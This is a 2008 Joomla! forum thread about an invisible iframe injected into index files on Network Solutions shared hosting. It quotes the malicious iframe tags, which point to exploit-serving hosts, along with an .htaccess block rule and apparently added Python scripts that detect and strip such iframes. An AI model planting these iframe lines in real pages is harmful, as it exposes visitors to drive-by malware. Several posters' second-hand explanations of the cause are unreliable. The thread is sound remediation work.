Joomla! Discussion Forums



Posted: Thu Feb 28, 2008 9:04 pm 
Joomla! Apprentice

Joined: Thu Feb 28, 2008 8:56 pm
Posts: 7
Something is inserting the following HTML into all of the index.html files on my Joomla site:

<iframe src="http://x-traff.info/in.cgi?default" width="0" height="0" frameborder="0"></iframe>

It has infected 289 files. I have all the files and directories on the site set to 775.

Joomla Version: 1.0.13
PHP Version: 4.4.7
Shared Hosting
URL to our site: http://www.harvestusa.org

This happened about a month ago and I simply removed the above HTML from each file, plus updated to 1.0.13.

Help!


Posted: Thu Feb 28, 2008 11:46 pm 
Joomla! Master

Joined: Thu Aug 18, 2005 8:55 pm
Posts: 13220
Location: Nijmegen, The Netherlands
Could you check if all necessary Joomla files are available (and not corrupted) on the server?
Joomla Diagnostics is a helpful tool to check that:
http://extensions.joomla.org/component/ ... Itemid,35/

Furthermore I would recommend upgrading to 1.0.15.
(backup your current site + database first!)

Recommended reading:
You think your site got hacked? Read this first, please!!! viewtopic.php?t=54006
Joomla Administrator's Security Checklist http://help.joomla.org/component/option ... temid,268/
List of Vulnerable 3rd Party/Non Joomla! Extensions http://help.joomla.org/component/option ... temid,268/

Joomla! Tools Suite v1.0 & Health, Installation and Security Audit Tool viewtopic.php?t=136328
Download: Joomla! Tools Suite (JTS-sa) & HISA (HISA-sa) http://extensions.joomla.org/component/ ... Itemid,35/

_________________
Kind Regards,
Peter Martin, Global Moderator - Community Leadership Team
www.db8.nl - Joomla specialist, Nijmegen, Nederland
Joomla 1.5 Quick Reference Guide: www.db8.nl/en/downloads/misc-downloads/ ... glish.html


Posted: Fri Feb 29, 2008 12:02 pm 
Joomla! Apprentice

Joined: Tue Feb 05, 2008 11:51 pm
Posts: 25
This could also be your host that is implanting this... Ask your host if they add banners or frames to your pages; that's a normal tactic on free hosts.


Posted: Fri Feb 29, 2008 1:01 pm 
Joomla! Apprentice

Joined: Thu Feb 28, 2008 8:56 pm
Posts: 7
Well .. this is what I ended up doing:

1. I upgraded the site from 1.0.13 to 1.0.15.
2. Copied down all the Joomla files.
3. Did a search-n-replace in all of the affected files.
4. Uploaded the entire site.

Here's where I began to have a different problem. When I attempted to log in to the backend, I got the following error:

mosmsg=Invalid%20Session

I could not log in. I then began to google around and found this link with a fix that fixed the problem:

http://forum.bbpixel.com/index.php?showtopic=4018

The code contained updates to the administrator index.php file and the includes joomla.php file. I am attaching the files.

Our ISP is Network Solutions, where we are on a shared server. I plan on contacting them about the issue. I did find this link, which had some explanation as to how this may have infected our files:

http://ddanchev.blogspot.com/2008/02/se ... ising.html

If I find out any more, I will respond to this post.

Cheers!


Posted: Fri Feb 29, 2008 1:15 pm 
Joomla! Apprentice

Joined: Thu Feb 28, 2008 8:56 pm
Posts: 7
Peter .. thanks for the links .. I'll definitely review them.

Regards,
- Troy


Posted: Mon Mar 03, 2008 7:04 am 
Joomla! Apprentice

Joined: Mon Dec 10, 2007 4:22 pm
Posts: 7
I will follow this closely because I just picked up a new client and their site has this problem (same Joomla specs and host).

Thanks, Pat


Last edited by PatricknHawaii on Mon Mar 03, 2008 4:40 pm, edited 1 time in total.

Posted: Mon Mar 03, 2008 7:51 am 
Joomla! Champion

Joined: Mon Aug 29, 2005 10:17 am
Posts: 7459
Location: Netherlands/S'pore/Bali/North America
This is a spyware exploit. There's an invisible iframe that points to x-traff.info/stds/go.php which redirects to coripastares.com which in turn serves a Java exploit. You simply have been hacked and you need a security check on your site....

The problem is, though, that this only happens at present with sites that are hosted on Network Solutions. I picked up a cached post from the YaBB forum:

Quote:
Post by ZachMatthews on 02/29/08 at 08:28:38
YaaBB Support (English) >> General Usage and Feature Troubleshooting >> YABB 2.1 - Network Solutions Hacked

Hey guys -

Bad news, guys. YaBB 2.1 has been hacked in a pretty big way (which you may already know about). This post is to serve two functions: (1) to tell you how to tell your users to fix their computers and (2) to see if YaBB 2.2 has fixed this vulnerability.

(1) The hack is an <iframe> exploit that is currently affecting Network Solutions' UNIX servers ONLY. If you are using a Windows Server package, it's not a problem.

The hack is simple: somehow the hacker exploits a vulnerability in YaBB 2.1 to put <iframe> redirect links in the bottom of each Index page, throughout your site. That means, not just YaBB's indexes, but also any other index.php or index.html file anywhere in your FTP server.

The symptoms are these: the redirect points the browser to x-traffic.info, a spammer's site, which then redirects to coripastares.com, another spammer's site. It then loads a Java exploit which most virus scanners should have no problems with. However, somehow this exploit causes Firefox browsers on PCs only to type backwards. Every word becomes sdarwkcab, you follow me?

Macintoshes are vulnerable to the Javascript hack in both Safari and Firefox, but the script doesn't seem to do anything.

The solution in both cases for users is to clear the Java console memory. Not the Temporary Internet Files, but the JAVA CONSOLE files. This is accomplished in various ways, but basically just go to the Java engine's specific menu and find the clear cache button.

(2) Is this exploit still a vulnerability in YaBB 2.2? Network Solutions assures me they are working on clearing the virus from their end, but in the meantime, the vulnerability is serious in YaBB 2.1. I plan to upgrade boards this weekend; will this fix my problem?

Thanks,
Zach


So I advise the 2 of you to contact Network Solutions, since cleaning your site won't help if NS is not secured, as the post is correct. You can only check this by contacting Network Solutions and pointing them to this issue.

Leo

_________________
For Specialized & Individual Support:: http://gws-desk.com
Joomla Specialized Development Solutions:: http://gws-studio.com
Professional & Dedicated Joomla Hosting :: gws-host.com
NEW: Specialized K2 Development Support at GWS-Desk


Posted: Mon Mar 03, 2008 4:52 pm 
Joomla! Apprentice

Joined: Mon Dec 10, 2007 4:22 pm
Posts: 7
leolam wrote:
I advise the 2 of you to contact Network Solutions since cleaning your site wont help if NS is not secured...

Thanks Leo! -Pat


Posted: Thu Mar 06, 2008 2:21 am 
Joomla! Apprentice

Joined: Thu Feb 28, 2008 8:56 pm
Posts: 7
Well .. this is my response from Network Solutions! Seems like they're exempting themselves. This response is from their 3rd level technical support.

Quote:
The issue you reported to Network Solutions on 3/3/2008 10:21:30 AM and assigned Service Request 1-330090436 has been processed.
You reported an issue with your site being hacked. We looked at your site, and it appears that you have a large number of index.html files infected in your site-back folder. Please restore your site-back folder from backup. To prevent this from happening in the future, we recommend you change your FTP passwords, update any scripts on your site, and scan your computer for viruses.
We apologize for any inconvenience.
Thank you for your patience.
We hope this update has been helpful. However, if you have any additional questions, or feel that the issue has not been completely addressed, please do not hesitate to email our Technical Support Department at technicalsupport@networksolutions.com or call us at 1-866-391-HELP (1-866-391-4357). If calling from outside the U.S. or Canada, please call 570.708.8788

Sincerely,

DAN017
Network Solutions Technical Support


I've already done everything they asked .. even did so the first time this happened and it reappeared. The site-back folder they are referring to is a backup of the base Joomla install, which at the time of the backup was, I think, already compromised.

Interestingly .. the main site has been offline now for 5 days, and has not been compromised, nor have any of the other backup directories. This leads me to believe it only replicates when it can browse (or scan) the site, however this is only speculation.

Any further suggestions?

- Troy


Posted: Thu Mar 06, 2008 2:54 am 
Joomla! Champion

Joined: Mon Aug 29, 2005 10:17 am
Posts: 7459
Location: Netherlands/S'pore/Bali/North America
Logical: nothing happens since the browser has been offline. Read what the exploit does?

Please go to http://prevx.com/ and run the free PC checkup... you will be amazed what they can find. We have this running corporate-wide on all PCs and (knock/knock) we have not had a single piece of malware on our systems in the 1 1/2 years we have used it now, where programs such as Ad-Aware, McAfee and Panda failed to discover stuff they did within seconds. It checks every process on/from your PC online against a huge database and works flawlessly.

Luck, my friend

Leo


Posted: Thu Mar 06, 2008 4:59 pm 
Joomla! Fledgling

Joined: Thu Mar 06, 2008 4:50 pm
Posts: 1
I am experiencing the same hack on a Network Solutions hosted site. I'm running a different MySQL/PHP based CMS, not Joomla. I found the malicious code a few weeks ago and took it off; interestingly, at that time it was only affecting the root-level index.php page of the site. Yesterday I found it again, tacked on to the end of the code on every page. I found this topic via Google and put in a support request to NSI. Receiving no response within 24 hours, I called today and got fairly blown off with "you have a vulnerable feedback form on your site." The technician claims I should modify the form code to accept only "short" strings of text from users. I'm a little skeptical; obviously there are zillions of Joomla and other CMS sites out there on other hosts that are not affected, only the NSI-hosted sites. And I should turn off my free-form comments entry field as a solution? WTF? The owner of this particular site is very loyal to NSI so moving the site is not really an option, not yet anyway.


Posted: Thu Mar 06, 2008 5:42 pm 
Joomla! Apprentice

Joined: Thu Feb 28, 2008 8:56 pm
Posts: 7
Just curious .. are you on a NS shared platform or dedicated platform? We're on shared, and I'm considering going to dedicated, however I'm not confident this would solve the problem. :-\


Posted: Thu Mar 20, 2008 11:33 pm 
Joomla! Enthusiast

Joined: Sun May 07, 2006 1:19 am
Posts: 139
I know it is against web forum etiquette to comment on a thread with "me too". But me too.
Network Solutions had me on the phone for less than 2 minutes when he said "I've found your problem" and he blamed it on Joomla being vulnerable. I told him I was also not able to FTP and he said... we've changed your password... hmmmmm. Now why do you think they did that and didn't tell me? There were some strange files in my CGI bin that I did not put there, and I asked if they belonged to them and he said no. I have no control over the site being on Netsol.


Posted: Fri Mar 21, 2008 3:58 pm 
Joomla! Ace

Joined: Tue Sep 06, 2005 11:18 am
Posts: 1171
Location: Germany
I read the thread with interest and I must say, hosters like Network Solutions get totally blocked in our firewalls / networks with such lousy abuse management... users get a message where we explain why, and we are done...

If more people would act so, I'll bet they'd have this issue solved in seconds...

No pressure, no solution at all...

_________________
MCITP - Microsoft Certified IT Professional | CCNA - Cisco Certified Network Administrator
LPI - Linux Professional | PN for Online Transcript ID Check
http://www.mindset.de


Posted: Fri Mar 21, 2008 4:03 pm 
Joomla! Intern

Joined: Wed Nov 28, 2007 10:16 pm
Posts: 82
To be honest with you all, even on shared hosting this behavior is pretty unacceptable. I would switch hosting providers ASAP. If it's been 21 days (minimum) since a security notice was issued to the company proper, the problem is widely known, AND they are telling their support staff to blame their customers, I'd bail simply on the principle of ethics, if not their incompetence.

Just my opinion. If someone told me that my site wasn't working "Because I was using Joomla, which is exploitable", I'd respond back with "Read up on your facts and stop spitting the company doctrine." Joomla in and of itself isn't terribly exploitable, and from the looks of it, it wasn't even Joomla that was exploited; it was YaBB (open source bulletin board system), which most of you probably weren't running. I'm not sure if it was Network Solutions' YaBB, or one of their clients' YaBB that was compromised, but regardless of which case it was, I would classify that behavior as immature professionalism at best.

Vote with your money. Get out of there.

_________________
It's really easy to make things complicated- the trick is to make them simple.
http://guitarhangar.com - webmaster
http://www.amediacreative.com - programmer/security (they didn't make the above site)


Posted: Mon Mar 31, 2008 11:56 pm 
Joomla! Fledgling

Joined: Thu Mar 27, 2008 12:45 am
Posts: 1
Hi everyone,
Just to add to this thread; I am/was hosted on a Network Solutions unix server and my site was also infected/modified/hacked with the <iframe> tag for x-traf.info. I was experimenting with Joomla! on another host but not on netsol. Every index file on my site had the code added to the end of the file. Even old index files that I had renamed (i.e. index.old.html). The files were modified on the 16th of March and I'm still waiting for Network Solutions to provide a response to the issue. I have moved all my files to a new host and I'm running Joomla! with virtually no issues. (One issue was that my domain was blacklisted because of the attack that I resolved by updating the .htaccess file).
When/If I hear back from netsol, I'll update this thread.
Take care,
Clif


Posted: Tue Apr 01, 2008 1:27 am 
Joomla! Apprentice

Joined: Thu Feb 28, 2008 8:56 pm
Posts: 7
Just a quick update for those of you following this thread.

Our site is still operational .. I brought it online about 4 weeks ago, and have not noticed the problem return. I really only did 2 things.

1. Manually removed the script from all the infected files .. what a pain! :eek:
2. Changed my ftp password .. at the recommendation of NetSol.

Not sure if this is a temporary solution, however if this problem returns again, I will let you know.

- Troy


Posted: Tue Apr 01, 2008 3:00 am 
Joomla! Enthusiast

Joined: Sun May 07, 2006 1:19 am
Posts: 139
NetSol changed my FTP password without telling me. I found out when I called them. I thought I had all of the code off the site and opened a "clean" index file and it propagated the iframe scourge on all the index pages again. Does anyone know how this thing executes?


Posted: Wed Apr 02, 2008 4:14 pm 
Joomla! Fledgling

Joined: Tue Feb 05, 2008 1:38 pm
Posts: 3
I have the same problem with my client page.

Code:
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>


QUICK REPLY: The problem is I can not find where it is written - root path index files look clean. I need to investigate it more...
But it looks like a wide problem.

The page is running on Joomla! 1.0.13 Stable [ Sunglow ] and in their own server.

I have done the session fix about a month ago...

My viewers' NOD32 antivirus program is saying that the page has a threat:
HTML/TrojanClicker.IFrame.AG. trojan

That's all I know atm. But to resolve the problem I need to remove the iframe, which files should I look into?

Thanks in advance,
I will let you know if i know more about this problem and will keep an eye on this thread.


Posted: Wed Apr 02, 2008 4:41 pm 
Joomla! Explorer

Joined: Thu Oct 13, 2005 1:51 am
Posts: 318
Location: Hamilton, ON
Quote:
I need to remove the iframe, which files should I look into?


You'll probably find it all over the place in your index.html, and index.php files (or at least I did).

EVERYONE : I can confirm that this is a Network Solution Problem. I've found references to the issue on a number of other non-Joomla sites, and the only commonality in NS Hosting. Support department is either lying, or clueless there.

For a short term solution, can we block the x-traff.info site via .htaccess?
Something like :

Block traffic from a single referrer:

Code:
RewriteEngine on
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} x-traff\.info [NC]
RewriteRule .* - [F]



Note that the 'options' line is commented. You may need to uncomment this..

_________________
Joomla! is a volunteer-based project. Be kind.


Posted: Wed Apr 02, 2008 4:56 pm 
Joomla! Explorer

Joined: Thu Oct 13, 2005 1:51 am
Posts: 318
Location: Hamilton, ON
Update : Well, I tried that .htaccess solution and it didn't work, commented or not.

Would that mean that :
a) It's not an effective solution
or (b) This is a DNS / Shared Hosting Issue primarily?

Any ideas?

_________________
Joomla! is a volunteer-based project. Be kind.


Posted: Wed Apr 02, 2008 11:46 pm 
Joomla! Explorer

Joined: Thu Oct 13, 2005 1:51 am
Posts: 318
Location: Hamilton, ON
Hey everyone,
I have a programmer working on this full-time here. (A new client called and requested our assistance in solving this problem).

Here's what we've been able to determine :

1) The problem is due to a UNIX virus infection at Network Solutions Shared Hosting.
2) The virus was 'discovered' in late February '08. Network Solutions originally explained the situation to customers who phoned in. They either haven't notified their hosting support about the problem, or they are just lying to people. (You can guess which one I think it is - my client said that the phone tech guy sounded like he was being directed by 'management').
3) The virus searches for any file with 'index' in its name (index.php, index.html, etc.). It adds the malware iframe to the end of the code, but doesn't add any additional code, or delete any existing code, beyond that.


The solution we're trying out is :

1) Download the entire site (and db) locally. Go through and remove the iframe from every "index'" file.
2) Migrate site to a new Web Host

Hopefully this will solve things. I'll update the thread if it does..

_________________
Joomla! is a volunteer-based project. Be kind.
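The posts above describe the injected tag as a zero-size iframe appended to the end of any file with "index" in its name, and note that the Referer-based RewriteRule tried earlier did not help. That outcome is expected: the rule only inspects requests arriving at your own site, while the iframe is fetched by the visitor's browser straight from the third-party host once the page is rendered, so the tag has to come out of the files themselves. The Python script below is an added example, not code from this thread or from the Joomla! project. It walks a downloaded copy of the site, reports every index-named file containing an iframe whose width and height are both 0, and, when asked, strips the tag after saving a .bak copy beside the file. The small site it builds in a temporary directory is constructed for the demo; the two injected tags are the ones quoted in this thread, and the "legitimate" 600x400 iframe is a made-up control that a cleaner must leave alone.

```python
import re
import shutil
import tempfile
from pathlib import Path

# An <iframe ...> tag with an optional empty closing tag; group 1 holds the attribute text.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>(?:\s*</iframe>)?", re.IGNORECASE | re.DOTALL)
# width=0 / height=0 in any quoting style; the lookahead rejects values such as "01" or "0.5".
ZERO_ATTR_RE = re.compile(r"\b(width|height)\s*=\s*[\"']?0(?:px)?[\"']?(?=[\s/>]|$)", re.IGNORECASE)

# The injected tags quoted in this thread, reused here as sample data for the demo.
INJECTED_TAG = ('<iframe src="http://x-traff.info/in.cgi?default" width="0" height="0" '
                'frameborder="0"></iframe>')
INJECTED_TAG_UPPER = ('<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" '
                      'width="0" height="0" frameborder="0"></iframe>')
# A constructed, legitimate iframe that a cleaner must not touch.
LEGIT_TAG = '<iframe src="https://maps.example.invalid/embed" width="600" height="400"></iframe>'


def is_hidden_iframe(attrs):
    """True when the attribute text sets both width and height to zero."""
    zeroed = {m.group(1).lower() for m in ZERO_ATTR_RE.finditer(attrs)}
    return zeroed == {"width", "height"}


def find_hidden_iframes(html):
    """Return the full text of every zero-size iframe found in html."""
    return [m.group(0) for m in IFRAME_RE.finditer(html) if is_hidden_iframe(m.group(1))]


def clean_html(html):
    """Return (html with zero-size iframes removed, list of removed tags)."""
    removed = []

    def strip_if_hidden(m):
        if is_hidden_iframe(m.group(1)):
            removed.append(m.group(0))
            return ""
        return m.group(0)

    return IFRAME_RE.sub(strip_if_hidden, html), removed


def is_index_file(path):
    """The thread reports the tag in every file with 'index' in its name (index.php, index.old.html, ...)."""
    return "index" in path.name.lower()


def scan_tree(root, clean=False, backup_suffix=".bak", name_filter=is_index_file):
    """Walk root and map each infected file (passing name_filter) to the tags found in it.

    With clean=True the tag is removed in place after a copy is saved as <file>.bak.
    Files are read and written as latin-1 so arbitrary bytes survive the round trip unchanged.
    """
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or not name_filter(path) or path.suffix == backup_suffix:
            continue
        html = path.read_text(encoding="latin-1")
        hits = find_hidden_iframes(html)
        if not hits:
            continue
        report[str(path)] = hits
        if clean:
            shutil.copy2(path, str(path) + backup_suffix)
            cleaned, _ = clean_html(html)
            path.write_text(cleaned, encoding="latin-1")
    return report


def build_sample_site(root):
    """Constructed site: two infected index files, one clean index file, one infected non-index page."""
    root = Path(root)
    (root / "sub").mkdir()
    (root / "index.html").write_text("<html><body>Hello</body></html>\n" + INJECTED_TAG, encoding="latin-1")
    (root / "sub" / "index.old.html").write_text("<p>old copy</p>\n" + INJECTED_TAG_UPPER, encoding="latin-1")
    (root / "index.php").write_text("<?php echo 'ok'; ?>\n" + LEGIT_TAG, encoding="latin-1")
    (root / "about.html").write_text("<p>about</p>\n" + INJECTED_TAG, encoding="latin-1")  # not index-named


def demo():
    """Scan, clean, rescan; returns (infected index files found, infected index files left afterwards)."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        before = scan_tree(tmp)
        scan_tree(tmp, clean=True)
        after = scan_tree(tmp)
        found = sorted(Path(p).relative_to(tmp).as_posix() for p in before)
        return found, len(after)


if __name__ == "__main__":
    print(demo())
```

The default filter follows the thread's observation and only looks at index-named files; pass `name_filter=lambda p: True` to sweep every file in the copy, which is the safer choice when you do not yet know how far the injection reached (in the demo that would also catch about.html). Run it against a local download first with `clean=False`, review the report, and only then clean and re-upload.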


Posted: Thu Apr 03, 2008 6:43 pm 
Joomla! Explorer

Joined: Thu Oct 13, 2005 1:51 am
Posts: 318
Location: Hamilton, ON
Here is some information on one of the Viruses that "x-traff" directs users to :

Trojan.Byte.Verify (aka Java.Byte.Verify) Description :
http://www.symantec.com/security_response/writeup.jsp?docid=2003-090514-4048-99

How to Remove :
http://wiki.answers.com/Q/How_do_you_get_rid_of_Java-ByteVerify

*Although AVG worked fine for me.

_________________
Joomla! is a volunteer-based project. Be kind.


Posted: Sat Apr 05, 2008 3:01 pm 
Joomla! Enthusiast

Joined: Sun May 07, 2006 1:19 am
Posts: 139
Has anyone found a solution to this issue? I keep cleaning the site and the iframe keeps reappearing. It is not just affecting the Joomla install but another domain hosted on the space with flat HTML files. I've contacted NetSol again and they are not answering my questions. As noted I have no control over the site being hosted there.


Posted: Sat Apr 05, 2008 3:12 pm 
Joomla! Explorer

Joined: Thu Oct 13, 2005 1:51 am
Posts: 318
Location: Hamilton, ON
Quote:
Has anyone found a solution to this issue?


The virus is on Network Solutions hosting - unless they clean it out, there's no solution immediately available that I see. We've tried cleaning out all the index.php, index.html files, but the <iframe> will return, until it's off their system.

We're still in the process of cleaning the site and moving it to a new host, which should fix things.

_________________
Joomla! is a volunteer-based project. Be kind.


Posted: Sun Apr 06, 2008 12:20 am 
Joomla! Apprentice

Joined: Thu Nov 16, 2006 12:55 am
Posts: 9
I called and was able to get what I believe to be the correct answer. What they said was that it was a php injection that infects folders with 777 permissions. Basically, a cross-server script can be entered into a search box if the search box doesn't clean the entry which creates a hidden file in the folder called .info.php. Inside that file is a php script that basically allows the hacker to run their remote script and modify the other pages.


Posted: Sun Apr 06, 2008 2:18 am 
Joomla! Enthusiast

Joined: Sun May 07, 2006 1:19 am
Posts: 139
At first they said I needed to remove Joomla because it was the problem. I told them that I have Joomla running successfully on other hosts.

Seems like they are also giving you excuses and trying to put the blame on the customer.

NONE of my folders have now nor ever had 777 permissions. They are at 775 or better and are "set gid"

I also have NO FILES called info.php anywhere on my account but even so, the flat index.html files keep getting bombarded with the i-frame code.

I asked them why I can't use a php.ini file to set register globals and they told me that they are so secure that they do not allow the customers to have access to the php.ini file and that the setting register_globals=on is perfectly safe. I tried to override with the .htaccess file to no avail.
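The support explanation relayed two posts up (world-writable 777 directories and a hidden .info.php dropped through an unsanitised form) and the reply above that found neither condition are both things a site owner can verify rather than argue about. The Python script below is an added example, not from this thread or from Joomla!: it lists world-writable directories, hidden files with a .php extension, and index-named files whose modification time is newer than a baseline you supply (an earlier poster dated the modified files to 16 March, which is the kind of cut-off you would pass). It assumes a POSIX filesystem, and the tree it builds in a temporary directory is constructed for the demo.

```python
import os
import stat
import tempfile
import time
from pathlib import Path


def audit_tree(root, baseline_mtime=None):
    """Collect three indicators discussed in the thread for every entry under root.

    world_writable_dirs:  directories whose mode includes o+w (777-style permissions).
    hidden_php_files:     dot-files ending in .php, such as the .info.php support described.
    modified_index_files: files with 'index' in the name whose mtime is newer than
                          baseline_mtime (skipped when no baseline is given).
    Entries are inspected with lstat, so symlinks are reported as themselves, not followed.
    """
    root = Path(root)
    findings = {"world_writable_dirs": [], "hidden_php_files": [], "modified_index_files": []}
    for path in [root, *root.rglob("*")]:
        st = path.lstat()
        rel = path.relative_to(root).as_posix()
        if stat.S_ISDIR(st.st_mode):
            if st.st_mode & stat.S_IWOTH:
                findings["world_writable_dirs"].append(rel)
        elif stat.S_ISREG(st.st_mode):
            name = path.name.lower()
            if name.startswith(".") and name.endswith(".php"):
                findings["hidden_php_files"].append(rel)
            if "index" in name and baseline_mtime is not None and st.st_mtime > baseline_mtime:
                findings["modified_index_files"].append(rel)
    for entries in findings.values():
        entries.sort()
    return findings


def build_sample_tree(root):
    """Constructed layout: one 777 directory holding a hidden .php file, one fresh and one old index file.

    Returns the baseline timestamp (24 hours ago) that separates the two index files.
    """
    root = Path(root)
    (root / "images").mkdir()
    os.chmod(root / "images", 0o777)  # the condition support blamed
    (root / "images" / ".info.php").write_text("<?php /* constructed stand-in for the hidden script */ ?>\n")
    (root / "old").mkdir()
    os.chmod(root / "old", 0o755)
    (root / "old" / "index.old.html").write_text("<html></html>\n")
    (root / "index.html").write_text("<html></html>\n")  # left with a current mtime
    baseline = time.time() - 86400
    stale = baseline - 86400
    os.utime(root / "old" / "index.old.html", (stale, stale))  # older than the baseline
    return baseline


def demo():
    """Build the sample tree and return the audit findings for it."""
    with tempfile.TemporaryDirectory() as tmp:
        baseline = build_sample_tree(tmp)
        return audit_tree(tmp, baseline_mtime=baseline)


if __name__ == "__main__":
    for key, entries in demo().items():
        print(f"{key}: {entries}")
```

On the host itself, with GNU find, the same three checks are `find . -type d -perm -o+w`, `find . -name '.*.php'` and `find . -iname '*index*' -newermt '2008-03-16'`. An empty result for the first two, as the poster above reports, is evidence worth quoting back to support; a non-empty third list tells you which files to diff against your last known-good backup.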


Posted: Sat Apr 12, 2008 2:46 pm 
Joomla! Explorer

Joined: Thu Oct 13, 2005 1:51 am
Posts: 318
Location: Hamilton, ON
Update :

Network Solutions seems to have cleared the virus out of our area of shared hosting there. However, this happened once before and then re-occurred (and then it appears that NS lied to us) - so we've migrated to a new host. The problem hasn't occurred again.

_________________
Joomla! is a volunteer-based project. Be kind.

